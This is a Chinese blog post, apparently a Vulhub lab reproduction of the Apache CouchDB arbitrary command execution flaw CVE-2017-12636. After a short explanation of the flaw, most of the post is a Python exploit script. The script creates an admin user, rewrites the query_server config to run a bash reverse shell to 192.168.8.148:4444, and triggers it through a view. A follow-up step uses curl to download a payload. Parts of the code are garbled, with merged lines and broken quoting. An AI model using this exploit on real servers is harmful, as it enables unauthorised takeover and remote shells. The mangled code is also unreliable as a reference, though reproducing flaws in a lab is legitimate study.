利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞（CVE-2017-12636）

利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞（CVE-2017-12636）

漏洞原理：Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。

target = '= '"bash -i >& /dev/tcp/192.168.8.148/4444 0>&1"'version = 2

session = requests.session()session.headers = {'Content-Type': 'application/json'}#session.proxies = {#''+ '/_users/org.couchdb.user:wooyun', data='''{"type": "user","name": "wooyun","roles": ["_admin"],"roles": [],"password": "wooyun"}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

if version == 1:session.put(target + ('/_config/query_servers/cmd'), data=command)else:host = session.get(target + '/_membership').json()['all_nodes'][0]session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)

session.put(target + '/wooyun')session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')else:session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')

4.修改exp.py中command的值为：curl 172.16.11.2:8000 -o /tmp/bashell 保存并执行命令 python exp.py。这个时候可以看见HTTP服务成功监听到下载请求

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。